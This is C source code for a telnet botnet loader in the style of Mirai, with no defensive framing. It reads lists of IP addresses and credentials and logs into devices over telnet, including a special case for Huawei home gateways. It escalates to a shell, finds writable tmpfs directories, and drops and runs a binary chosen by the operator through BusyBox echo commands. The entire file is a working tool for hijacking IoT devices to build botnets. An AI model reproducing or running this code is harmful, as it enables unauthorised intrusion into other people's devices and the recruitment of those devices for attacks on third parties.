#define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define TOKEN "/bin/busybox VDOSS" #define TOKEN_VERIFY "applet not found" #define EXEC_VERIFY "YESHELLO" #define BYTES_PER_LINE 128 #define CHARS_PER_BYTE 5 #define MAX_SLICE_LENGTH (BYTES_PER_LINE * CHARS_PER_BYTE) static char *bind_ip = ""; static unsigned char debug_mode = 0; static int maxConnectedSockets = 0; static char *bin_server = NULL; static unsigned short bin_port = NULL; static char *bin_path = NULL; volatile int running_threads = 0; volatile unsigned long found_srvs = 0; volatile unsigned int bytes_sent = 0; volatile unsigned long timed_out = 0; volatile unsigned long login_done = 0; volatile unsigned long failed_connect = 0; volatile unsigned long remote_hangup = 0; volatile unsigned short port = 0; volatile unsigned int maxFDSaw = 0; FILE *infd; char *run_arg = NULL; static int epollFD; struct stateSlot_t { int slotUsed; pthread_mutex_t mutex; unsigned char success; unsigned char is_open; unsigned char special; unsigned char got_prompt; uint8_t pathInd; uint16_t echoInd; int complete; uint32_t ip; int fd; int updatedAt; int reconnecting; unsigned char state; char path[5][32]; char username[32]; char password[32]; }; struct { int num_slices; unsigned char **slices; } binary; struct stateSlot_t stateTable[1024 * 100] = {0}; extern float ceilf (float x); static int diff(int val) { return (val > 0) ? val : 0; } int matchPrompt(char *bufStr) { int i = 0, q = 0; char *prompts = ":>%$#"; char *tmpStr = malloc(strlen(bufStr) + 1); memset(tmpStr, 0, strlen(bufStr) + 1); // ayy lmao copy pasta for removing ansi shit char in_escape = 0; for (i = 0; i < strlen(bufStr); i++) { if (bufStr[i] == '\x1B') { if (in_escape == 0) in_escape = 1; } else if ((in_escape == 1) && (strchr("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", bufStr[i]) != NULL)) { in_escape = 0; } else if (in_escape == 0) { strncat(tmpStr, &(bufStr[i]), 1); } } int bufLen = strlen(tmpStr); for(i = 0; i < strlen(prompts); i++) { while(bufLen > q && (*(tmpStr + bufLen - q) == 0x00 || *(tmpStr + bufLen - q) == ' ' || *(tmpStr + bufLen - q) == '\r' || *(tmpStr + bufLen - q) == '\n')) q++; if(*(tmpStr + bufLen - q) == prompts[i]) { free(tmpStr); return 1; } } free(tmpStr); return 0; } void hexDump(char *desc, void *addr, int len) { int i; unsigned char buff[17]; unsigned char *pc = (unsigned char*)addr; if (desc != NULL) printf ("%s:\n", desc); for (i = 0; i < len; i++) { if ((i % 16) == 0) { if (i != 0) printf (" %s\n", buff); printf (" %04x ", i); } printf (" %02x", pc[i]); if ((pc[i] < 0x20) || (pc[i] > 0x7e)) buff[i % 16] = '.'; else buff[i % 16] = pc[i]; buff[(i % 16) + 1] = '\0'; } while ((i % 16) != 0) { printf (" "); i++; } printf (" %s\n", buff); } int log_recv(int sock, void *buf, int len, int flags) { memset(buf, 0, len); int ret = recv(sock, buf, len, flags); if (ret > 0) { int i = 0; for(i = 0; i < ret; i++) { if (((char *)buf)[i] == 0x00) { ((char *)buf)[i] = 'A'; } } } if (debug_mode) { char hex_buf[32] = {0}; sprintf(hex_buf, "state %d - recv: %d", stateTable[sock].state, ret); if (ret != -1) hexDump(hex_buf, buf, ret); else printf("%s\n", hex_buf); } return ret; } int log_send(int sock, void *buf, int len, int flags) { if (debug_mode) { char hex_buf[32] = {0}; sprintf(hex_buf, "state %d - send: %d", stateTable[sock].state, len); hexDump(hex_buf, buf, len); } bytes_sent+=len; return send(sock, buf, len, flags); } int sockprintf(int sock, char *formatStr, ...) { char textBuffer[2048] = {0}; memset(textBuffer, 0, 2048); va_list args; va_start(args, formatStr); vsprintf(textBuffer, formatStr, args); va_end(args); int q = log_send(sock,textBuffer,strlen(textBuffer), MSG_NOSIGNAL); return q; } void *memmem(const void *l, size_t l_len, const void *s, size_t s_len) { register char *cur, *last; const char *cl = (const char *)l; const char *cs = (const char *)s; if (l_len == 0 || s_len == 0) return NULL; if (l_len < s_len) return NULL; if (s_len == 1) return memchr(l, (int)*cs, l_len); last = (char *)cl + l_len - s_len; for (cur = (char *)cl; cur <= last; cur++) if (cur[0] == cs[0] && memcmp(cur, cs, s_len) == 0) return cur; return NULL; } void handle_remote_closed(int fd) { remote_hangup++; } void handle_timeout(int fd) { timed_out++; } void handle_failed_connect(int fd) { failed_connect++; } void handle_found(int fd) { /* struct stateSlot_t *state = &stateTable[fd]; struct sockaddr_in name; int namelen = (sizeof (struct sockaddr_in)); getpeername(state->fd, &name, &namelen); FILE *fp = fopen("loaded.txt", "a"); fprintf(outfd, "%d.%d.%d.%d:%s:%s:%s:%d:%d:%d\n", (name.sin_addr.s_addr & 0xff), ((name.sin_addr.s_addr & (0xff << 8)) >> 8), ((name.sin_addr.s_addr & (0xff << 16)) >> 16), ((name.sin_addr.s_addr & (0xff << 24)) >> 24), state->username, state->password, state->path, state->wget, state->endianness, state->arch ); fclose(outfd); */ found_srvs++; } void closeAndCleanup(int fd) { if(stateTable[fd].slotUsed && stateTable[fd].fd == fd) { stateTable[fd].slotUsed = 0; stateTable[fd].state = 0; stateTable[fd].path[0][0] = 0; stateTable[fd].path[1][0] = 0; stateTable[fd].path[2][0] = 0; stateTable[fd].path[3][0] = 0; stateTable[fd].path[4][0] = 0; stateTable[fd].username[0] = 0; stateTable[fd].password[0] = 0; stateTable[fd].echoInd = 0; stateTable[fd].pathInd = 0; stateTable[fd].success = 0; stateTable[fd].special = 0; stateTable[fd].got_prompt = 0; if(stateTable[fd].is_open) { stateTable[fd].is_open = 0; shutdown(fd, SHUT_RDWR); struct linger linger; linger.l_onoff = 1; linger.l_linger = 0; setsockopt(fd, SOL_SOCKET, SO_LINGER, (char *) &linger, sizeof(linger)); close(fd); } } } void updateAccessTime(int fd) { if(stateTable[fd].slotUsed && stateTable[fd].fd == fd) { stateTable[fd].updatedAt = time(NULL); } } int getConnectedSockets() { int q = 0, i = 0; for(q = 0; q < maxFDSaw; q++) if(stateTable[q].slotUsed) i++; return i; } void *flood(void *par1) { __sync_fetch_and_add(&running_threads, 1); unsigned char buf[10241] = {0}; struct epoll_event pevents[25] = {0}; int ret = 0, i = 0, got = 0, ii = 0; while((ret = epoll_wait( epollFD, pevents, 25, 10000 )) >= 0 || (ret == -1 && errno == EINTR)) { if(ret == 0) continue; for(i = 0; i < ret; i++) { if((pevents[i].events & EPOLLERR) || (pevents[i].events & EPOLLHUP) || (pevents[i].events & EPOLLRDHUP) || (!(pevents[i].events & EPOLLIN) && !(pevents[i].events & EPOLLOUT))) { struct stateSlot_t *state = &stateTable[pevents[i].data.fd]; if (state->state == 0) handle_failed_connect(state->fd); else handle_remote_closed(state->fd); pthread_mutex_lock(&state->mutex); closeAndCleanup(state->fd); pthread_mutex_unlock(&state->mutex); } else if(pevents[i].events & EPOLLIN) { int is_closed = 0; struct stateSlot_t *state = &stateTable[pevents[i].data.fd]; memset(buf, 0, 10241); pthread_mutex_lock(&state->mutex); int old_state = state->state; got = 0; do { if(state->state == 1) { if ((got = log_recv(state->fd, buf, 1, MSG_PEEK)) > 0 && buf[0] == 0xFF) state->state = 2; if (got > 0 && buf[0] != 0xFF) state->state = 3; } if (state->state == 2) { //from first peek log_recv(state->fd, buf, 1, 0); got = log_recv(state->fd, buf + 1, 2, 0); if (got > 0) { state->state = 1; if (buf[1] == 0xFD && buf[2] == 31) { unsigned char tmp1[3] = {255, 251, 31}; log_send(state->fd, tmp1, 3, MSG_NOSIGNAL); unsigned char tmp2[9] = {255, 250, 31, 0, 80, 0, 24, 255, 240}; log_send(state->fd, tmp2, 9, MSG_NOSIGNAL); continue; } for (ii = 0; ii < 3; ii++) { if (buf[ii] == 0xFD) buf[ii] = 0xFC; else if (buf[ii] == 0xFB) buf[ii] = 0xFD; } log_send(state->fd, buf, 3, MSG_NOSIGNAL); } } } while(got > 0 && state->state != 3); if (state->state == 3) { while ((got = log_recv(state->fd, buf, 10240, 0)) > 0) { //special case for huawei if (memmem(buf, got, "Huawei Home Gateway", 19) != NULL) state->special = 1; if (memmem(buf, got, "BusyBox", 7) != NULL) { state->got_prompt = 1; //maybe we are logged in already? LOL sockprintf(state->fd, "enable\r\n"); state->state = 7; break; } if (memmem(buf, got, "ogin", 4) != NULL || memmem(buf, got, "sername", 7) != NULL || matchPrompt(buf)) { state->got_prompt = 1; sockprintf(state->fd, "%s\r\n", state->username); state->state = 4; break; } } } if (state->state == 4) { while ((got = log_recv(state->fd, buf, 10240, 0)) > 0) { if (memmem(buf, got, "assword", 7) != NULL || matchPrompt(buf)) { sockprintf(state->fd, "%s\r\n", state->password); state->state = 5; break; } } } if (state->state == 5) { while ((got = log_recv(state->fd, buf, 10240, 0)) > 0) { if (strcasestr(buf, "access denied") != NULL || strcasestr(buf, "invalid password") != NULL || strcasestr(buf, "login incorrect") != NULL || strcasestr(buf, "password is wrong") != NULL) { //bad login. reconnect and retry state->state = 254; break; } if (strcasestr(buf, "BusyBox") != NULL || matchPrompt(buf)) { //REASONABLY sure we got a good login. sockprintf(state->fd, "enable\r\n"); state->state = 6; break; } } } if (state->state == 6) { while ((got = log_recv(state->fd, buf, 10240, 0)) > 0) { sockprintf(state->fd, "shell\r\n"); state->state = 7; break; } } if (state->state == 7) { while ((got = log_recv(state->fd, buf, 10240, 0)) > 0) { sockprintf(state->fd, "sh\r\n"); if (state->special == 1) { state->state = 250; } else { state->state = 8; } break; } } if (state->state == 8) { while ((got = log_recv(state->fd, buf, 10240, 0)) > 0) { if (matchPrompt(buf)) { sockprintf(state->fd, "%s\r\n", TOKEN); state->state = 9; break; } } } if (state->state == 9) { while ((got = log_recv(state->fd, buf, 10240, 0)) > 0) { if (strcasestr(buf, TOKEN_VERIFY) != NULL && matchPrompt(buf)) { sockprintf(state->fd, "cat /proc/mounts\r\n"); state->state = 10; break; } } } if (state->state == 10) { while ((got = log_recv(state->fd, buf, 10240, 0)) > 0) { if (strstr(buf, "tmpfs") != NULL || strstr(buf, "ramfs") != NULL) { char *tmp_buf = buf; char *start = NULL; char *space = NULL; int memes = 0; do { start = strstr(tmp_buf, "tmpfs") != NULL ? strstr(tmp_buf, "tmpfs") : strstr(tmp_buf, "ramfs"); space = strchr(start, ' '); if (start != tmp_buf && *(start - 1) != '\n') { //this is a middle of line find while(start > buf && *start != '\n') start--; //WEVE GONE TOO FAR GOTTA BLAST if (start == buf) continue; start++; space = strchr(start, ' '); } if (space[1] == '/') { int iii = 1; for (iii = 1; ; iii++) { if (space[iii] == '\0' || space[iii] == ' ') { break; } } if (iii > 1) { strncpy(state->path[memes], &space[1], iii - 1); state->path[memes][iii - 1] = '\0'; memes++; } space = space + iii; if (space[0] != '\0') { for (iii = 1; ; iii++) { if (space[iii] == '\0' || space[iii] == ' ') { break; } } space = space + iii; } else { break; } } tmp_buf = space; } while(strstr(tmp_buf, "tmpfs") != NULL || strstr(tmp_buf, "ramfs") != NULL && memes < 5); if (strlen(state->path[0]) == 0) { strcpy(state->path[0], "/"); } sockprintf(state->fd, "/bin/busybox mkdir -p %s; /bin/busybox rm %s/a; /bin/busybox cp -f /bin/sh %s/a && /bin/busybox VDOSS\r\n", state->path[0], state->path[0], state->path[0]); state->state = 100; break; } else if (matchPrompt(buf)) { strcpy(state->path[0], "/var/run"); sockprintf(state->fd, "/bin/busybox mkdir -p %s; /bin/busybox rm %s/a; /bin/busybox cp -f /bin/sh %s/a && /bin/busybox VDOSS\r\n", state->path[0], state->path[0], state->path[0]); state->state = 100; break; } } } if (state->state == 100) { while ((got = log_recv(state->fd, buf, 10240, 0)) > 0) { if (strcasestr(buf, "applet not found") != NULL) { sockprintf(state->fd, "/bin/busybox echo -ne '' > %s/a && /bin/busybox VDOSS\r\n", state->path[state->pathInd]); state->state = 101; break; } else if (matchPrompt(buf)) { state->pathInd++; if (state->pathInd == 5 || strlen(state->path[state->pathInd]) == 0) { strcpy(state->path[0], "/var/run"); state->pathInd = 0; sockprintf(state->fd, "/bin/busybox echo -ne '' > %s/a && /bin/busybox VDOSS\r\n", state->path[state->pathInd]); state->state = 101; break; } sockprintf(state->fd, "/bin/busybox mkdir -p %s; /bin/busybox rm %s/a; /bin/busybox cp -f /bin/sh %s/a && /bin/busybox VDOSS\r\n", state->path[state->pathInd], state->path[state->pathInd], state->path[state->pathInd]); break; } } } if (state->state == 101) { while ((got = log_recv(state->fd, buf, 10240, 0)) > 0) { if (strcasestr(buf, "applet not found") != NULL) { sockprintf(state->fd, "/bin/busybox echo -ne %s >> %s/a && /bin/busybox VDOSS\r\n", binary.slices[state->echoInd++], state->path[state->pathInd]); if (state->echoInd == binary.num_slices) state->state = 102; else state->state = 101; break; } } } if (state->state == 102) { while ((got = log_recv(state->fd, buf, 10240, 0)) > 0) { if (strcasestr(buf, "applet not found") != NULL) { sockprintf(state->fd, "%s/a %s; /bin/busybox VDOSS\r\n", state->path[state->pathInd], run_arg); state->state = 103; break; } } } if (state->state == 103) { while ((got = log_recv(state->fd, buf, 10240, 0)) > 0) { if (strcasestr(buf, "applet not found") != NULL) { state->state = 255; break; } } } if (state->state == 250) { while ((got = log_recv(state->fd, buf, 10240, 0)) > 0) { if (matchPrompt(buf)) { sockprintf(state->fd, "show text /proc/self/environ\r\n"); state->state = 251; break; } } } if (state->state == 251) { while ((got = log_recv(state->fd, buf, 10240, 0)) > 0) { if (memmem(buf, got, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 16) != NULL || matchPrompt(buf)) { sockprintf(state->fd, "export PS1=\"prompt>\"\r\n"); state->state = 8; break; } } } //reconnect and retry if (state->state == 254) { closeAndCleanup(state->fd); is_closed = 1; } if (state->state == 255) { if (state->success) { handle_found(state->fd); } closeAndCleanup(state->fd); is_closed = 1; } if (state->slotUsed && (old_state != state->state || state->state == 101)) updateAccessTime(state->fd); pthread_mutex_unlock(&state->mutex); if (!is_closed) { struct epoll_event event = {0}; event.data.fd = state->fd; event.events = EPOLLIN | EPOLLRDHUP | EPOLLET | EPOLLONESHOT; epoll_ctl(epollFD, EPOLL_CTL_MOD, state->fd, &event); } } else if(pevents[i].events & EPOLLOUT) { struct stateSlot_t *state = &stateTable[pevents[i].data.fd]; pthread_mutex_lock(&state->mutex); if(state->state == 0) { int so_error = 0; socklen_t len = sizeof(so_error); getsockopt(state->fd, SOL_SOCKET, SO_ERROR, &so_error, &len); if (so_error) { handle_failed_connect(state->fd); closeAndCleanup(state->fd); pthread_mutex_unlock(&state->mutex); continue; } state->state = 1; pevents[i].events = EPOLLIN | EPOLLRDHUP | EPOLLET | EPOLLONESHOT; epoll_ctl(epollFD, EPOLL_CTL_MOD, state->fd, &pevents[i]); } else { printf("wrong state on connect epoll: %d\n", state->fd); closeAndCleanup(state->fd); } pthread_mutex_unlock(&state->mutex); } } } __sync_fetch_and_sub(&running_threads, 1); return NULL; } void sighandler(int sig) { printf("\nctrl-c\n"); exit(0); } void chomp(char *s) { while(*s && *s != '\n' && *s != '\r') s++; *s = 0; } void *loader(void *threadCount) { char readmelolfgt[1024], *hahgay; memset(readmelolfgt, 0, 1024); char *pch = NULL; char *running, *orig, *token; while(fgets(readmelolfgt, 1024, infd) != NULL) { while(getConnectedSockets() > (maxConnectedSockets - 1)) { int curTime = time(NULL); int q; for(q = 0; q < maxFDSaw; q++) { pthread_mutex_lock(&stateTable[q].mutex); if(stateTable[q].slotUsed && curTime > (stateTable[q].updatedAt + 60) && stateTable[q].reconnecting == 0) { if (stateTable[q].state == 0) handle_failed_connect(stateTable[q].fd); else handle_timeout(stateTable[q].fd); closeAndCleanup(stateTable[q].fd); } pthread_mutex_unlock(&stateTable[q].mutex); } usleep(1000000); } running = orig = strdup(readmelolfgt); token = strsep(&running, ":"); if(token == NULL || inet_addr(token) == -1) { free(orig); continue; } struct sockaddr_in dest_addr = {0}; memset(&dest_addr, 0, sizeof(struct sockaddr_in)); dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(23); dest_addr.sin_addr.s_addr = inet_addr(token); int fd = 0; struct sockaddr_in my_addr = {0}; do { if (errno != EBADF && fd > 0) close(fd); fd = 0; if((fd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))<0) { perror("cant open socket"); exit(-1); } fcntl(fd, F_SETFL, fcntl(fd, F_GETFL, NULL) | O_NONBLOCK); int flag = 1; setsockopt(fd, IPPROTO_TCP, TCP_NODELAY, (char *) &flag, sizeof(int)); memset(&my_addr, 0, sizeof(struct sockaddr_in)); my_addr.sin_addr.s_addr = inet_addr(bind_ip); my_addr.sin_port = htons(port++); my_addr.sin_family = AF_INET; errno = 0; } while(bind(fd, (struct sockaddr *)&my_addr, sizeof(my_addr)) != 0); printf("bound\n"); int res = 0; res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)); if(res < 0 && errno != EINPROGRESS) { close(fd); continue; } if(fd > maxFDSaw) maxFDSaw = fd + 1; pthread_mutex_lock(&stateTable[fd].mutex); if(!stateTable[fd].slotUsed) { printf("memes\n"); stateTable[fd].fd = fd; stateTable[fd].updatedAt = time(NULL); stateTable[fd].slotUsed = 1; stateTable[fd].state = 0; stateTable[fd].is_open = 1; stateTable[fd].special = 0; token = strsep(&running, ":"); strcpy(stateTable[fd].username, token); token = strsep(&running, ":"); strcpy(stateTable[fd].password, token); } else { printf("used slot found in loader thread?\n"); } pthread_mutex_unlock(&stateTable[fd].mutex); struct epoll_event event = {0}; event.data.fd = fd; event.events = EPOLLOUT | EPOLLRDHUP | EPOLLET | EPOLLONESHOT; epoll_ctl(epollFD, EPOLL_CTL_ADD, fd, &event); free(orig); } printf("done reading input file.\n"); while(1) { int curTime = time(NULL); int q; for(q = 0; q < maxFDSaw; q++) { pthread_mutex_lock(&stateTable[q].mutex); if(stateTable[q].slotUsed && curTime > (stateTable[q].updatedAt + 60) && stateTable[q].reconnecting == 0) { if (stateTable[q].state == 0) handle_failed_connect(stateTable[q].fd); else handle_timeout(stateTable[q].fd); closeAndCleanup(stateTable[q].fd); } pthread_mutex_unlock(&stateTable[q].mutex); } sleep(1); } close(epollFD); } int load_binary(char *path) { // /proc/self/exe still works even when we delete ourselves l0l int fd, size = 0, got = 0, i, slice = 0; unsigned char ch; if ((fd = open(path, O_RDONLY)) == -1) return -1; while ((got = read(fd, &ch, 1)) > 0) size++; close(fd); binary.num_slices = ceil(size / (float)BYTES_PER_LINE); binary.slices = calloc(binary.num_slices, sizeof(unsigned char *)); if (binary.slices == NULL) return -1; for (i = 0; i < binary.num_slices; i++) { binary.slices[i] = calloc(1, MAX_SLICE_LENGTH + 1); if (binary.slices[i] == NULL) return -1; } if ((fd = open(path, O_RDONLY)) == -1) return -1; do { for (i = 0; i < BYTES_PER_LINE; i++) { got = read(fd, &ch, 1); if (got != 1) break; sprintf(binary.slices[slice] + strlen(binary.slices[slice]), "\\\\x%02X", ch); } slice++; } while(got > 0); close(fd); return 0; } int main(int argc, char *argv[ ]) { if(argc < 4){ fprintf(stderr, "Invalid parameters!\n"); fprintf(stdout, "Usage: %s (debug mode)\n", argv[0]); exit(-1); } signal(SIGPIPE, SIG_IGN); epollFD = epoll_create(0xDEAD); bind_ip = argv[1]; infd = fopen(argv[2], "r"); signal(SIGINT, &sighandler); int threads = atoi(argv[5]); maxConnectedSockets = atoi(argv[6]); if (argc == 8) debug_mode = 1; int i; for(i = 0; i < (1024 * 100); i++) { pthread_mutex_init(&stateTable[i].mutex, NULL); } load_binary(argv[3]); run_arg = argv[4]; pthread_t thread; pthread_create( &thread, NULL, &loader, (void *) &threads); for(i = 0; i < threads; i++) pthread_create( &thread, NULL, &flood, (void *) NULL); char timeText[100]; time_t now = time(NULL); struct tm *t = localtime(&now); strftime(timeText, sizeof(timeText)-1, "%d %b %Y %l:%M %p %Z", t); printf("Starting Scan at %s\n", timeText); char temp[17] = {0}; memset(temp, 0, 17); sprintf(temp, "Loaded"); printf("%-16s", temp); memset(temp, 0, 17); sprintf(temp, "State Timeout"); printf("%-16s", temp); memset(temp, 0, 17); sprintf(temp, "No Connect"); printf("%-16s", temp); memset(temp, 0, 17); sprintf(temp, "Closed Us"); printf("%-16s", temp); memset(temp, 0, 17); sprintf(temp, "Logins Tried"); printf("%-16s", temp); memset(temp, 0, 17); sprintf(temp, "B/s"); printf("%-16s", temp); memset(temp, 0, 17); sprintf(temp, "Connected"); printf("%-16s", temp); memset(temp, 0, 17); sprintf(temp, "Running Thrds"); printf("%s", temp); printf("\n"); sleep(1); char *new; new = (char *)malloc(16*6); while (debug_mode ? 1 : running_threads > 0) { printf("\r"); memset(new, '\0', 16*6); sprintf(new, "%s|%-15lu", new, found_srvs); sprintf(new, "%s|%-15lu", new, timed_out); sprintf(new, "%s|%-15lu", new, failed_connect); sprintf(new, "%s|%-15lu", new, remote_hangup); sprintf(new, "%s|%-15lu", new, login_done); sprintf(new, "%s|%-15d", new, bytes_sent); sprintf(new, "%s|%-15lu", new, getConnectedSockets()); sprintf(new, "%s|%-15d", new, running_threads); printf("%s", new); fflush(stdout); bytes_sent=0; sleep(1); } printf("\n"); now = time(NULL); t = localtime(&now); strftime(timeText, sizeof(timeText)-1, "%d %b %Y %l:%M %p %Z", t); printf("Scan finished at %s\n", timeText); return 0; }